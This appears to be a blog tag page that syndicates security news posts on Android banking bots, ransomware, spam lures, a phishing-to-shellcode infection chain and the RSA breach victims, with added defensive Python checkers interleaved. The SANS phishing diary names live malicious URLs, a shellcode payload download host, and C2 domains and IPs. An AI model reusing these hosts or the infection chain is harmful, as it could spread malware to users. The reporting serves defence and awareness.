Posts tagged ‘trend micro’

Krebs on Security: Android Botnet Targets Middle East Banks

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

I recently encountered a botnet targeting Android smartphone users who bank at financial institutions in the Middle East. The crude yet remarkably effective mobile bot that powers this whole operation comes disguised as one of several online banking apps, has infected more than 2,700 phones, and has intercepted at least 28,000 text messages.

The botnet — which I’ve affectionately dubbed “Sandroid” — comes bundled with Android apps made to look like mobile two-factor authentication modules for various banks, including Riyad Bank, SAAB (formerly the Saudi British Bank), AlAhliOnline (National Commercial Bank), Al Rajhi Bank, and Arab National Bank.

The fake Android bank apps employed by the Sandroid botnet.

It’s not clear how the apps are initially presented to victims, but if previous such scams are any indication they are likely offered after infecting the victim’s computer with a password-stealing banking Trojan. Many banks send customers text messages containing one-time codes that are used to supplement a username and password when the customer logs on to the bank’s Web site. And that precaution of course requires attackers interested in compromising those accounts to also hack the would-be victim’s phone.

Banking Trojans — particularly those targeting customers of financial institutions outside of the United States — will often throw up a browser pop-up box that mimics the bank and asks the user to download a “security application” on their mobile phones. Those apps are instead phony programs that merely intercept and then relay the victim’s incoming SMS messages to the botnet master, who can then use the code along with the victim’s banking username and password to log in as the victim.

Some of the 28,000+ text messages intercepted by the Sandroid botnet malware.

This particular botnet appears to have been active for at least the past year, and the mobile malware associated with it has been documented by both Symantec and Trend Micro. The malware itself seems to be heavily detected by most of the antivirus products on the market, but then again it’s likely that few — if any — of these users are running antivirus applications on their mobile devices.

In addition, this fake bank campaign appears to have previously targeted Facebook, as well as banks in Australia and Spain, including Caixa Bank, Commonwealth Bank, National Australia Bank, and St. George Bank.

The miscreant behind this campaign seems to have done little to hide his activities. The same registry information that was used to register the domain associated with this botnet — funnygammi.com — was also used to register the phony bank domains that delivered this malware, including alrajhiankapps.com, commbankaddons.com, facebooksoft.net, caixadirecta.net, commbankapps.com, nationalaustralia.org, and stgeorgeaddons.com. The registrar used in each of those cases was Center of Ukrainian Internet Names.

I am often asked if people should be using mobile antivirus products. From my perspective, most of these malicious apps don’t just install themselves; they require the user to participate in the fraud. Keeping your mobile device free of malware involves following some of the same steps outlined in my Tools for a Safer PC and 3 Rules primers: Chiefly, if you didn’t go looking for it, don’t install it! If you own an Android device and wish to install an application, do your homework before installing the program. That means spending a few moments to research the app in question, and not installing apps that are of dubious provenance. 

That said, this malware appears to be well-detected by mobile antivirus solutions. Many antivirus firms offer free mobile versions of their products. Some are free, and others are free for the initial use — they will scan and remove malware for free but charge for yearly subscriptions. Some of the free offerings include AVG, Avast, Avira, Bitdefender, Dr. Web, ESET, Fortinet, Lookout, Norton, Panda Cloud Antivirus, Sophos, and ZoneAlarm.

Incidentally, the mobile phone number used to intercept all of the text messages is +79154369077, which traces back to a subscriber in Moscow on the Mobile Telesystems network.

Schneier on Security: PowerLocker uses Blowfish

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

There’s a new piece of ransomware out there, PowerLocker (also called PrisonLocker), that uses Blowfish:

PowerLocker could prove an even more potent threat because it would be sold in underground forums as a DIY malware kit to anyone who can afford the $100 for a license, Friday’s post warned. CryptoLocker, by contrast, was custom built for use by a single crime gang. What’s more, PowerLocker might also offer several advanced features, including the ability to disable the task manager, registry editor, and other administration functions built into the Windows operating system. Screen shots and online discussions also indicate the newer malware may contain protections that prevent it from being reverse engineered when run on virtual machines.

PowerLocker encrypts files using keys based on the Blowfish algorithm. Each key is then encrypted to a file that can only be unlocked by a 2048-bit private RSA key. The Malware Must Die researchers said they had been monitoring the discussions for the past few months. The possibility of a new crypto-based ransomware threat comes as developers continue to make improvements to the older CryptoLocker title. Late last month, for instance, researchers at antivirus provider Trend Micro said newer versions gave the CryptoLocker self-replicating abilities that allowed it to spread through USB thumb drives.

Krebs on Security: A Closer Look: Perkele Android Malware Kit

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

In March 2013 I wrote about Perkele, a crimeware kit designed to create malware for Android phones that can help defeat multi-factor authentication used by many banks. In this post, we’ll take a closer look at this threat, examining the malware as it is presented to the would-be victim as well as several back-end networks set up by cybercrooks who have been using mobile bots to fleece banks and their customers.

Perkele disguises itself as various Android security applications and certificates.

Perkele is sold for $1,000, and it’s made to interact with a wide variety of malware already resident on a victim’s PC. When a victim visits his bank’s Web site, the Trojan (be it Zeus or Citadel or whatever) injects malicious code into the victim’s browser, prompting the user to enter his mobile information, including phone number and OS type.

That information is relayed back to the attacker’s control server, which injects more code into the victim’s browser prompting him to scan a QR code with his mobile device to install an additional security mechanism.

Once the victim scans the QR code, the Perkele malware is downloaded and installed, allowing the attackers to intercept incoming SMS messages sent to that phone. At that point, the malware on the victim’s PC automatically initiates a financial transaction from the victim’s account.

When the bank sends an SMS with a one-time code, Perkele intercepts that code and sends it to the attacker’s control server. Then the malicious script on the victim’s PC receives the code and completes the unauthorized transaction.

Web site security firm Versafe located a server that was being used to host malicious scripts tied to at least one Perkele operation. The company produced this report (PDF), which delves a bit deeper into the behavior and network activity generated by the crimeware kit.

Versafe’s report includes several screenshots of the Perkele application as offered to would-be victims. The malware is presented as a security certificate; it’s named “zertificate” because the victim in this case banked at a German financial institution.

Perkele disguised as a security certificate for a German bank. Source: Versafe.

A few weeks ago, I encountered the back end system for what appears to be a Perkele distribution, or perhaps some other mobile malware bot; I should note that disguising an Android banking Trojan as a security certificate is not a ruse that’s limited to Perkele: The Pincert SMS malware also employs this trick, according to F-Secure.

Anyhow, I scarcely had time to examine this particular mobile bot control panel before it was either taken down by German authorities or was moved elsewhere by the fraudsters. But it, too, was intercepting one-time codes from German banking victims using an Android malware component similarly disguised as a “zertificate.”

This Android SMS bot control panel targeted German bank customers.

Apparently, it was fairly successful, stealing one-time codes from online banking customers of several German financial institutions, including Postbank and Comdirect.

Dozens of German banking customers were victimized by this Android bot control panel.

In the screen grab below, we can see the main administrative page of this panel, which controls which banks should be targeted and from where the fraudulent text messages should be sent.

There seems to be a great deal of interest in the cybercrime underground for developing or procuring tools to trojanize Android devices. According to a recent report from security firm Trend Micro, the number of malicious and high-risk Android apps steadily increased in the first six months of 2013. According to Trend, the number of malicious and high-risk apps took three years to reach 350,000, a number that has already doubled in just the first half of 2013.

Android malware growth in the first six months of 2013. Source: Trend Micro

Fortunately, a modicum of common sense and impulse control can keep most Android users out of trouble. Take a moment to read and comprehend an app’s permissions before you install it. Also, consider downloading and installing apps only from Google’s Play store, which scans all apps for malware. Also, there are numerous free and paid anti-malware applications available for Android.
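One way to put "read and comprehend an app's permissions" into practice, as an added example that is not part of the original post: the check below reads a decoded AndroidManifest.xml and flags the combination this post describes, an app that can read incoming SMS, has a channel to relay it, and registers a high-priority SMS receiver. The manifests, package names and the priority threshold are constructed assumptions.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
HIGH_PRIORITY = 999  # assumption: threshold for "wants to see the SMS first"


def _priority(intent_filter):
    """android:priority as an int; missing or malformed values count as 0."""
    try:
        return int(intent_filter.get(ANDROID + "priority", "0"))
    except ValueError:
        return 0


def review_manifest(xml_text):
    """Summarise the SMS-related capabilities a decoded manifest declares."""
    root = ET.fromstring(xml_text.strip())
    perms = {p.get(ANDROID + "name", "").rsplit(".", 1)[-1]
             for p in root.iter("uses-permission")}
    sms_access = sorted(perms & {"RECEIVE_SMS", "READ_SMS"})
    relay = sorted(perms & {"INTERNET", "SEND_SMS"})

    # Receivers that ask to be handed incoming SMS ahead of other apps.
    greedy = []
    for receiver in root.iter("receiver"):
        for flt in receiver.iter("intent-filter"):
            actions = {a.get(ANDROID + "name") for a in flt.iter("action")}
            if SMS_RECEIVED in actions and _priority(flt) >= HIGH_PRIORITY:
                greedy.append(receiver.get(ANDROID + "name"))

    if sms_access and relay and greedy:
        verdict = "suspicious"   # can read, relay, and pre-empt incoming SMS
    elif sms_access and relay:
        verdict = "review"       # legitimate messengers look like this too
    else:
        verdict = "ok"
    return {"package": root.get("package"), "sms_access": sms_access,
            "relay": relay, "high_priority_sms_receivers": greedy,
            "verdict": verdict}


# Constructed manifests (not taken from any real app).
FAKE_TOKEN = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.banktoken">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <receiver android:name=".SmsHook">
      <intent-filter android:priority="1000">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

CHAT_APP = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.chat">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <receiver android:name=".VerifyCodeReceiver">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

FLASHLIGHT = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.flashlight">
  <uses-permission android:name="android.permission.CAMERA"/>
  <application/>
</manifest>
"""

if __name__ == "__main__":
    for manifest in (FAKE_TOKEN, CHAT_APP, FLASHLIGHT):
        print(review_manifest(manifest))
```

A "suspicious" verdict is a prompt to look closer, not proof of malice; a "security certificate" or bank token app has no reason to sit in front of every incoming text message.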

SANS Internet Storm Center, InfoCON: green: Exploit Sample for Win32/CVE-2012-0158, (Sat, Jun 1st)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Two weeks ago I posted a diary on a report published by Trend Micro on a spear-phishing email campaign using malicious Word documents exploiting a Microsoft Office vulnerability (CVE-2012-0158).

We received a sample of a Word document exploiting CVE-2012-0158, which I took a look at. The file itself is pretty small (325Kb) and, based on VirusTotal's MD5 hash report, 30/47 scan engines detected and confirmed it exploits CVE-2012-0158. I used the malwr sandbox to get a better look at how this Word document behaves while running on a Windows system. The one thing I noticed is that Yara was positive on a check for whether the file is running in a virtual machine.


———–

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

SANS Internet Storm Center, InfoCON: green: UPDATEDx1: Boston-Related Malware Campaigns Have Begun – Now with Waco Plant Explosion Fun, (Wed, Apr 17th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

UPDATE: 04-18-2013 @ 10:10 AM CDT -

Some of the spam campaigns are now changing over to the Waco plant explosion. Basically the lure is the same: a subject that mentions the video, and then an IP-only URL with /texas.html or /news.html. The landing page has a few embedded YouTube videos and an iframe with malicious content at the end.

** End Update 1 **

About mid-afternoon yesterday (Central time – US), Boston-related spam campaigns began. The general "hook" is that it sends a URL with a subject about the video from the explosions. Similar to when Osama Bin Laden was killed and fake images were used as a hook, in this case, the video is relevant to the story and being used as a hook. Right now, very roughly 10-20% of all spam is related to this (some spamtraps reporting more, some less). Similar IPs have also been sending pump & dump scams, so likely the same group has re-tasked itself.

Here is a list of subjects I've seen hit spam traps:

Subject: 2 Explosions at Boston Marathon
Subject: Aftermath to explosion at Boston Marathon
Subject: Arbitron. Dial Global. Boston Bombings
Subject: Boston Explosion Caught on Video
Subject: BREAKING – Boston Marathon Explosion
Subject: Explosion at Boston Marathon
Subject: Explosion at the Boston Marathon
Subject: Explosions at Boston Marathon
Subject: Explosions at the Boston Marathon
Subject: Opinion: Boston Marathon Explosions made by radical Gays? Really? – CNN.com
Subject: Opinion: Boston Marathon Explosions – Romney Benefits? – CNN.com
Subject: Opinion: Boston Marathon Worse Sensation – Osama bin Laden still alive!? – CNN.com
Subject: Opinion: FBI knew about bombs 3 days before Boston Marathon – Why and Who Benefits? – CNN.com
Subject: Opinion: Osama Bin Laden video about Boston Marathon Explosions – bad news for all the world. – CNN.com
Subject:[SPAM] 2 Explosions at Boston Marathon
Subject:[SPAM] Boston Explosion Caught on Video
Subject:[SPAM] Explosions at the Boston Marathon
Subject:[SPAM] Video of Explosion at the Boston Marathon 2013
Subject: Stiri:EXPLOZIILE de la maratonul din Boston/Spaga este negociata la granita Romaniei/A inventat bautura care INLOCUIESTE MANCAREA/TUNELUL cu mecanisme de NEINTELES al lui STALIN/70 % din infrastructura RCS-RDS este amplasata ILEGAL/BOMBA ANULUI IN SHOWBIZ
Subject: Video of Explosion at the Boston Marathon 2013

Here is a list of malicious URLs in those messages (use at your own risk):

Some of these are already down, but basically plain pages with a handful of embedded YouTube videos that are relevant.  Early versions would redirect to fetch a file: boston___________AVI.exe and on down the rabbit hole it goes.  It was pretty loud so most AV should have sigs already.
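The lure described in this diary (an explosion-themed subject plus a URL whose host is a bare IP address and whose path is /boston.html, /news.html or /texas.html) can be matched in a mail filter. The sketch below is an added example, not part of the original diary; the subject keyword list is an assumption distilled from the subjects above, and the sample messages are constructed using documentation-only addresses.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Landing-page names reported in the diary for the Boston and Waco lures.
LURE_PATHS = {"/boston.html", "/news.html", "/texas.html"}
# Assumption: keywords distilled from the subject lines listed in the diary.
SUBJECT_RE = re.compile(r"\b(explosions?|marathon|boston|waco|texas)\b", re.I)
URL_RE = re.compile(r"""\b(?:https?|hxxps?)://[^\s<>"']+""", re.I)


def refang(url):
    """Undo common defanging (hxxp, [.]) so the URL can be parsed."""
    url = re.sub(r"^hxxp", "http", url, flags=re.I)
    return url.replace("[.]", ".")


def is_ip_only_lure(url):
    """True when the host is a literal IP address and the path is a lure page."""
    try:
        parts = urlsplit(refang(url))
        ipaddress.ip_address(parts.hostname or "")
    except ValueError:
        return False  # malformed URL, or a DNS name rather than a bare IP
    return parts.path.lower() in LURE_PATHS


def classify(subject, body):
    """Return (verdict, matching_urls) for one message."""
    urls = [u.rstrip(".,;)") for u in URL_RE.findall(body)]
    hits = [u for u in urls if is_ip_only_lure(u)]
    if hits and SUBJECT_RE.search(subject):
        return "block", hits     # lure URL and lure subject together
    if hits:
        return "review", hits    # IP-only lure page, unrelated subject
    return "pass", []


# Constructed sample messages: (subject, body).
SAMPLES = [
    ("Explosion at the Boston Marathon",
     "Watch: hxxp://192.0.2.44/boston.html"),
    ("Fwd: quarterly numbers",
     "Draft is at http://198.51.100.7/news.html."),
    ("Video of Explosion at the Boston Marathon 2013",
     "Coverage: http://news.example.com/boston.html"),
    ("Raw Video: Texas explosion",
     "http://203.0.113.9/texas.html"),
]


def triage(samples):
    """Verdicts for a batch of (subject, body) pairs, in order."""
    return [classify(subject, body)[0] for subject, body in samples]


if __name__ == "__main__":
    for (subject, _), verdict in zip(SAMPLES, triage(SAMPLES)):
        print(f"{verdict:6}  {subject}")
```

Matching on the structure of the URL rather than on individual addresses keeps the rule useful as the sending hosts rotate.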
 
H/T to Nick Tabick and Corbin Souffrant, two of my students at the University of Illinois who helped dig into this last night.
 


John Bambenek
bambenek \at\ gmail /dot/ com
Bambenek Consulting


SANS Internet Storm Center, InfoCON: green: Phishing with obfuscated javascript, shellcode and malware, (Fri, Mar 2nd)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Be careful with the links shown in this diary because they are live and could infect your computer if not handled properly.

Phishing e-mail artwork is becoming more effective every day. Users are having a bad time trying to distinguish the fake sites from the real ones. I am going to show you a different phishing e-mail that does not take the user to a website to try to steal a password but installs malware on the computer using obfuscated JavaScript and shellcode.

I received today the following message:

This looked strange. I reviewed the link and it pointed me to http://thedizzybaker.com/wp-includes/int-market.html. The following JavaScript appeared:

This JavaScript is obfuscated. I used Firebug to get more information and got an iframe pointing to another website:

Following the new link, we find another obfuscated javascript. Let’s see a snip of it:

Now here is where the malicious stuff begins. After deobfuscating the script, we find the following:

The script tries to determine which browser is running on the system:

The script tries to determine the Adobe Flash and Adobe Reader version installed:

A shellcode is executed:

Let’s take a look at the shellcode. It executes the following instructions:

1. kernel32.VirtualProtect: This function is called in the shellcode to establish a 255-byte memory segment where the memory protection attributes can be modified. For more information about the available attributes, see http://msdn.microsoft.com/en-us/library/windows/desktop/aa366786%28v=vs.85%29.aspx.
2. kernel32.LoadLibraryA: This function is called to load the urlmon.dll library, which is used to transfer information using the HTTP protocol. A couple of functions inside the file are:
3. urlmon.URLDownloadToFileA: The function is called to download http://migdaliasbistro.net/w.php?f=f7d19e=1 and save it to wpbt0.dll.
4. kernel32.WinExec: This function is called to register the DLL using regsvr32 -s, after which it is executed.
5. kernel32.TerminateThread: This function is called to end the execution of the shellcode.

The file downloaded in step 3 is a DLL with MD5 c3124a2981d8e1b9e13e8c21c96448f7. VirusTotal shows a 7/43 detection ratio. It injects into explorer.exe and performs inline hooking of ntdll.dll. Once it is installed, it reports to hbirjhcnsuiwgtrq.ru, which resolves to the following IP addresses: 94.20.30.91, 98.103.133.13, 173.203.211.157, 211.44.250.173, 46.137.85.218, 83.170.91.152, 87.120.41.155, using an HTTP POST to the /rwx/B2_9w3/in/ location.
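The call sequence above (load urlmon.dll, download to a file, then run regsvr32 on that same file) is a behaviour that can be searched for in sandbox API traces. The matcher below is an added example, not part of the original diary; the one-call-per-line trace format, the argument values and the dropper.example URL are constructed assumptions.

```python
import ntpath
import re

# Assumed trace format (hypothetical sandbox export): module.Function(arg, ...)
CALL_RE = re.compile(r"^\s*(\w+\.\w+)\((.*)\)\s*$")


def parse_trace(lines):
    """Turn trace lines into (api, [args]) tuples; unparseable lines are skipped."""
    calls = []
    for line in lines:
        m = CALL_RE.match(line)
        if not m:
            continue
        # Naive comma split: adequate here because arguments contain no commas.
        args = [a.strip().strip('"') for a in m.group(2).split(",") if a.strip()]
        calls.append((m.group(1).lower(), args))
    return calls


def find_download_and_register(calls):
    """Match, in order: load urlmon -> download to file -> WinExec regsvr32 on it.

    Unrelated calls may be interleaved. Returns a finding dict or None.
    """
    virtualprotect_seen = False  # context only, not required for a match
    urlmon_loaded = False
    url = dest = None
    for api, args in calls:
        text = " ".join(args).lower()
        if api == "kernel32.virtualprotect":
            virtualprotect_seen = True
        elif api == "kernel32.loadlibrarya" and "urlmon" in text:
            urlmon_loaded = True
        elif api == "urlmon.urldownloadtofilea" and urlmon_loaded:
            # The URL is the first http(s) argument; the target file follows it.
            for i, arg in enumerate(args[:-1]):
                if arg.lower().startswith(("http://", "https://")):
                    url, dest = arg, args[i + 1]
                    break
        elif api == "kernel32.winexec" and dest:
            if "regsvr32" in text and ntpath.basename(dest).lower() in text:
                return {"url": url, "file": dest, "command": args[0],
                        "virtualprotect_seen": virtualprotect_seen}
    return None


def analyze(lines):
    return find_download_and_register(parse_trace(lines))


# Constructed traces. The first mirrors the five steps listed in the diary.
MALICIOUS = [
    'kernel32.VirtualProtect(0x0012f000, 255, 0x40)',
    'kernel32.GetTickCount()',
    'kernel32.LoadLibraryA("urlmon.dll")',
    'urlmon.URLDownloadToFileA(NULL, "http://dropper.example/w.php", "wpbt0.dll", 0, NULL)',
    'kernel32.WinExec("regsvr32 -s wpbt0.dll", 0)',
    'kernel32.TerminateThread(0xfffffffe, 0)',
]

# A program that downloads a file with urlmon but never registers it.
BENIGN = [
    'kernel32.LoadLibraryA("urlmon.dll")',
    'urlmon.URLDownloadToFileA(NULL, "https://updates.example/manifest.xml", "manifest.xml", 0, NULL)',
    'kernel32.WinExec("notepad.exe readme.txt", 1)',
]

# Same calls as MALICIOUS, but regsvr32 runs before anything was downloaded.
REORDERED = [MALICIOUS[4]] + MALICIOUS[:4]

if __name__ == "__main__":
    for name, trace in (("malicious", MALICIOUS), ("benign", BENIGN),
                        ("reordered", REORDERED)):
        print(name, analyze(trace))
```

Requiring that the registered file is the one just downloaded is what separates this chain from ordinary urlmon use.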

Such threats are increasing, and controlling them involves establishing malware control measures as part of the Information Security Architecture of the company, like the following:

Antimalware perimeter defense: I recommend using the Trend Micro and McAfee web gateways. They are scalable and integrate very well with the antimalware monitoring system inside the corporation. This measure protects users from downloading malicious code like JavaScript and executables.
Host IPS: Antimalware control alone is not enough these days, as the threats are evolving and the antivirus companies are no longer able to control all the emerging malware attacks in real time. This tool is used to prevent the exploitation of vulnerabilities on computers, such as buffer overflow and code injection, among others. Thus, the computer is protected until the virus signature is out so the antimalware program is able to deal with the respective threat.
Antimalware: This is the conventional antimalware control that is sold by the antivirus companies.

Manuel Humberto Santander Peláez

SANS Internet Storm Center – Handler

Twitter: @manuelsantander

Web: http://manuel.santander.name

e-mail: msantand at isc dot sans dot org


Krebs on Security: Warnings About Windows Exploit, pcAnywhere

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Security experts have spotted drive-by malware attacks exploiting a critical security hole in Windows that Microsoft recently addressed with a software patch. Separately, Symantec is warning users of its pcAnywhere remote administration tool to either update or remove the program, citing a recent data breach at the security firm that the company said could help attackers find holes in the aging software title.

On Thursday, Trend Micro said it had encountered malware that leverages a vulnerability in the way Windows handles certain media files. This is a browse-and-get-owned flaw for Windows XP, Windows Vista, Windows Server 2003 and 2008 users, meaning these folks can infect their machines merely by browsing to a hacked or malicious site hosting a specially crafted media file. If you run Windows and have delayed installing this month’s updates, consider taking care of that now by visiting Windows Update.

Trend Micro competitor Symantec also issued a warning this week — about threats to its own software. Responding to a now widely-publicized break-in that resulted in the theft of its proprietary source code in 2006, Symantec issued a 10-page white paper with recommendations for customers still using this software. The company says fewer than 50,000 people are still using pcAnywhere, but those who are should consider applying newly-released updates, or removing the program altogether.

From that whitepaper (PDF):

With this incident pcAnywhere customers have increased risk. Malicious users with access to the source code have an increased ability to identify vulnerabilities and build new exploits. Additionally, customers that are not following general security best practices are susceptible to man-in-the-middle attacks which can reveal authentication and session information. General security best practices include endpoint, network, remote access, and physical security, as well as configuring pcAnywhere in a way that minimizes potential risks.

At this time, Symantec recommends disabling the product until Symantec releases a final set of software updates that resolve currently known vulnerability risks. For customers that require pcAnywhere for business critical purposes, it is recommended that customers understand the current risks, ensure pcAnywhere 12.5 is installed, apply all relevant patches as they are released, and follow the general security best practices discussed herein.

On Thursday, Symantec released updates to address at least three security vulnerabilities in pcAnywhere 12.5 for Windows. The company said it plans to issue additional updates for pcAnywhere 12.0, pcAnywhere 12.1 and pcAnywhere 12.5, although it didn’t say precisely when those updates would be available.

It’s generally a bad idea to leave remote administration tools like pcAnywhere always on and always accessible via the Internet. If you must use them, I’d strongly recommend limiting allowable connections to specific computer names or Internet addresses, limiting the number of consecutive logon attempts, and, if feasible, incorporating some type of token-based solution.

Krebs on Security: Who Else Was Hit by the RSA Attackers?

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

The data breach disclosed in March by security firm RSA received worldwide attention because it highlighted the challenges that organizations face in detecting and blocking intrusions from targeted cyber attacks. The subtext of the story was that if this could happen to one of the largest and most integral security firms, what hope was there for organizations that aren’t focused on security?

Security experts have said that RSA wasn’t the only corporation victimized in the attack, and that dozens of other multinational companies were infiltrated using many of the same tools and Internet infrastructure. But so far, no one has been willing to talk publicly about which other companies may have been hit.  Today’s post features a never-before-published list of those victim organizations. The information suggests that more than 760 other organizations had networks that were compromised with some of the same resources used to hit RSA. Almost 20 percent of the current Fortune 100 companies are on this list.

Since the RSA incident was disclosed, lawmakers in the U.S. Congress have taken a renewed interest in so-called “advanced persistent threat” or APT attacks. Some of the industry’s top security experts have been summoned to Capitol Hill to brief lawmakers and staff about the extent of the damage. The information below was shared with congressional staff.

Below is a list of companies whose networks were shown to have been phoning home to some of the same control infrastructure that was used in the attack on RSA. The first victims appear to have begun communicating with the attacker’s control networks as early as November 2010.

A few caveats are in order here. First, many of the network owners listed are Internet service providers, and are likely included because some of their subscribers were hit. Second, it is not clear how many systems in each of these companies or networks were compromised, for how long those intrusions persisted, or whether the attackers successfully stole sensitive information from all of the victims. Finally, some of these organizations (there are several antivirus firms mentioned below) may be represented because they intentionally compromised internal systems in an effort to reverse engineer malware used in these attacks.

Among the more interesting names on the list are Abbott Labs, the Alabama Supercomputer Network, Charles Schwab & Co., Cisco Systems, eBay, the European Space Agency, Facebook, Freddie Mac, Google, the General Services Administration, the Inter-American Development Bank, IBM, Intel Corp., the Internal Revenue Service (IRS), the Massachusetts Institute of Technology, Motorola Inc., Northrop Grumman, Novell, Perot Systems, PriceWaterhouseCoopers LLP, Research in Motion (RIM) Ltd., Seagate Technology, Thomson Financial, Unisys Corp., USAA, Verisign, VMWare, Wachovia Corp., and Wells Fargo & Co.

At the end of the victim list is a pie chart that shows the geographic distribution of the command and control networks used to coordinate the attacks. The chart indicates that the overwhelming majority of the C&Cs are located in or around Beijing, China.

302-DIRECT-MEDIA-ASN
8e6 Technologies, Inc.
AAPT AAPT Limited
ABBOTT Abbot Labs
ABOVENET-CUSTOMER – Abovenet Communications, Inc
ACCNETWORKS – Advanced Computer Connections
ACEDATACENTERS-AS-1 – Ace Data Centers, Inc.
ACSEAST – ACS Inc.
ACS-INTERNET – Affiliated Computer Services
ACS-INTERNET – Armstrong Cable Services
ADELPHIA-AS – Road Runner HoldCo LLC
Administracion Nacional de Telecomunicaciones
AERO-NET – The Aerospace Corporation
AHP – WYETH-AYERST/AMERICAN HOME PRODUCTS
AIRLOGIC – Digital Magicians, Inc.
AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
AIS-WEST – American Internet Services, LLC.
AKADO-STOLITSA-AS _AKADO-Stolitsa_ JSC
ALCANET Corporate ALCANET Access
ALCANET-DE-AS Alcanet International Deutschland GmbH
ALCATEL-NA – Alcanet International NA
ALCHEMYNET – Alchemy Communications, Inc.
Alestra, S. de R.L. de C.V.
ALLIANCE-GATEWAY-AS-AP Alliance Broadband Services Pvt. Ltd.,Alliance Gateway AS,Broadband Services Provider,Kolkata,India
ALMAZAYA Almazaya gateway L.L.C
AMAZON-AES – Amazon.com, Inc.
AMERITECH-AS – AT&T Services, Inc.
AMNET-AU-AP Amnet IT Services Pty Ltd
ANITEX-AS Anitex Autonomus System
AOL-ATDN – AOL Transit Data Network
API-DIGITAL – API Digital Communications Group, LLC
APOLLO-AS LATTELEKOM-APOLLO
APOLLO-GROUP-INC – University of Phoenix
APT-AP AS
ARLINGTONVA – Arlington County Government

ARMENTEL Armenia Telephone Company
AS INFONET
AS3215 France Telecom – Orange
AS3602-RTI – Rogers Cable Communications Inc.
AS4196 – Wells Fargo & Company
AS702 Verizon Business EMEA – Commercial IP service provider in Europe
ASATTCA AT&T Global Network Services – AP
ASC-NET – Alabama Supercomputer Network
ASDANIS DANIS SRL
ASGARR GARR Italian academic and research network
ASIAINFO-AS-AP ASIA INFONET Co.,Ltd./ TRUE INTERNET Co.,Ltd.
ASIANDEVBANK – Asian Development Bank
ASN852 – Telus Advanced Communications
AS-NLAYER – nLayer Communications, Inc.
ASTOUND-CABLE – Wave Broadband, LLC
AT&T Global Network Services – EMEA
AT&T US
ATMAN ATMAN Autonomous System
ATOMNET ATOM SA
ATOS-AS ATOS Origin Infogerance Autonomous System
ATT-INTERNET4 – AT&T Services, Inc.
AUGERE-AS-AP Augere Wireless Broadband Bangladesh Limited
AVAYA AVAYA
AVENUE-AS Physical person-businessman Kuprienko Victor Victorovich
AXAUTSYS ARAX I.S.P.
BACOM – Bell Canada
BAHNHOF Bahnhof AB
BALTKOM-AS SIA _Baltkom TV SIA_
BANGLALINK-AS an Orascom Telecom Company, providing GSM service in Bangladesh
BANGLALION-WIMAX-BD Silver Tower (16 & 18th Floor)
BANKINFORM-AS Ukraine
BASEFARM-ASN Basefarm AS. Oslo – Norway
BBIL-AP BHARTI Airtel Ltd.
BBN Bredbaand Nord I/S
BC-CLOUD-SERVICES
BEAMTELE-AS-AP Beam Telecom Pvt Ltd
BEE-AS JSC _VimpelCom_
BELINFONET Belinfonet Autonomus System, Minsk, Belarus
BELLSOUTH-NET-BLK – BellSouth.net Inc.
BELPAK-AS BELPAK
BELWUE Landeshochschulnetz Baden-Wuerttemberg (BelWue)
BENCHMARK-ELECTRONICS – Benchmark Electronics Inc.
BEND-BROADBAND – Bend Cable Communications, LLC
BEZEQ-INTERNATIONAL-AS Bezeqint Internet Backbone
BIGNET-AS-ID Elka Prakarsa Utama, PT
BLUEWIN-AS Swisscom (Schweiz) AG
BM-AS-ID PT. Broadband Multimedia, Tbk
BN-AS Business network j.v.
BNSF-AS – Burlington Northern Sante Fe Railway Corp
BNT-NETWORK-ACCESS – Biz Net Technologies
BORNET Boras Energi Nat AB
BREEZE-NETWORK TOV TRK _Briz_
BSC-CORP – Boston Scientific Corporation
BSKYB-BROADBAND-AS BSkyB Broadband
BSNL-NIB National Internet Backbone
BT BT European Backbone
BT-ITALIA BT Italia S.p.A.
BTN-ASN – Beyond The Network America, Inc.
BTTB-AS-AP Telecom Operator & Internet Service Provider as well
BT-UK-AS BTnet UK Regional network
CABLECOM Cablecom GmbH
CABLE-NET-1 – Cablevision Systems Corp.
CABLEONE – CABLE ONE, INC.
CABLEVISION S.A.
CACHEFLOW-AS – Bluecoat Systems, Inc.
CANET-ASN-4 – Bell Aliant Regional Communications, Inc.
CANTV Servicios, Venezuela
CAPEQUILOG – CapEquiLog
CARAVAN CJSC Caravan-Telecom
CARRIER-NET – Carrier Net
CATCHCOM Ventelo
CCCH-3 – Comcast Cable Communications Holdings, Inc
CDAGOVN – Government Telecommunications and Informatics Services
CDS-AS Cifrovye Dispetcherskie Sistemy
CDT-AS CD-Telematika a.s.
CE-BGPAC – Covenant Eyes, Inc.
CELLCO-PART – Cellco Partnership DBA Verizon Wireless
CENSUSBUREAU – U. S. Bureau of the Census
